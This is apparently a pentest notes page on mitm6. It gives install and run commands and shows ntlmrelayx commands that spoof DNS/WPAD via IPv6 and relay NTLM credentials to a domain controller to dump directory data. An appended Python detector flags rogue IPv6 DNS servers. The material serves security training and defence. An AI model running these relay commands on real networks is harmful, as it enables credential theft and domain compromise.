# mitm6

## Installation

$ git clone https://github.com/fox-it/mitm6.git

$ cd mitm6

$ pip install .

$ mitm6 -d \<domain>

## Use with ntlmrelayx

Notice the IPv6 address listed as a DNS server. The real vulnerability is that Windows prefers IPv6 over IPv4, meaning I now control DNS. We now leverage that control of DNS by spoofing WPAD answers again via ntlmrelayx.py. I wrote a guide on how to set it up here. With mitm6 running in one window, open another and run ntlmrelayx.py.

$ ntlmrelayx.py -wh \<Attacker IP> -t smb://\<Domain Controller>/

OR

$ ntlmrelayx.py -t ldap\://\<IP of DC>/

-wh: Server hosting WPAD file (Attacker’s IP)

-t: Target (You cannot relay credentials to the same device that you’re spoofing)

With the second command, it can dump loot, which can be used to run up BloodHound!

{% embed url="<https://github.com/dirkjanm/mitm6>" %}
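
The IPv6 DNS server entry mentioned above is also what a defender can check for on a host. The following is an added example, not part of mitm6 or of the original page: it parses `ipconfig /all` text and reports any IPv6 resolver that is not on an approved list. The sample output, adapter names, addresses and the function names are constructed for illustration, and the approved list is assumed to hold the organisation's real DNS servers.

```python
import ipaddress

# Constructed sample of `ipconfig /all` output (not captured from a real host).
SAMPLE = """\
Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : corp.example
   IPv4 Address. . . . . . . . . . . : 10.0.0.55(Preferred)
   DNS Servers . . . . . . . . . . . : fe80::20c:29ff:fe12:3456%11
                                       10.0.0.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Ethernet1:

   DNS Servers . . . . . . . . . . . : 10.0.0.10
                                       10.0.0.11
"""

def dns_servers_by_adapter(text):
    """Map adapter name -> list of DNS server strings from ipconfig /all text."""
    adapters, current, in_dns = {}, None, False
    for line in text.splitlines():
        if line and not line[0].isspace() and line.rstrip().endswith(":"):
            current, in_dns = line.rstrip()[:-1], False   # new adapter section
            adapters[current] = []
        elif current is None or not line.strip():
            in_dns = False
        elif " : " in line:
            key, value = line.split(" : ", 1)
            in_dns = key.strip(" .").lower() == "dns servers"
            if in_dns and value.strip():
                adapters[current].append(value.strip())
        elif in_dns:                      # continuation line: another server
            adapters[current].append(line.strip())
    return adapters

def unexpected_ipv6_dns(text, approved):
    """Return (adapter, server, is_link_local) for IPv6 resolvers not approved."""
    allowed = {ipaddress.ip_address(a) for a in approved}
    findings = []
    for adapter, servers in dns_servers_by_adapter(text).items():
        for server in servers:
            addr = ipaddress.ip_address(server.split("%")[0])  # drop zone id
            if addr.version == 6 and addr not in allowed:
                findings.append((adapter, server, addr.is_link_local))
    return findings
```

A finding on a network that does not run DHCPv6 or IPv6 DNS is worth investigating, since clients there should only list the known IPv4 resolvers.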
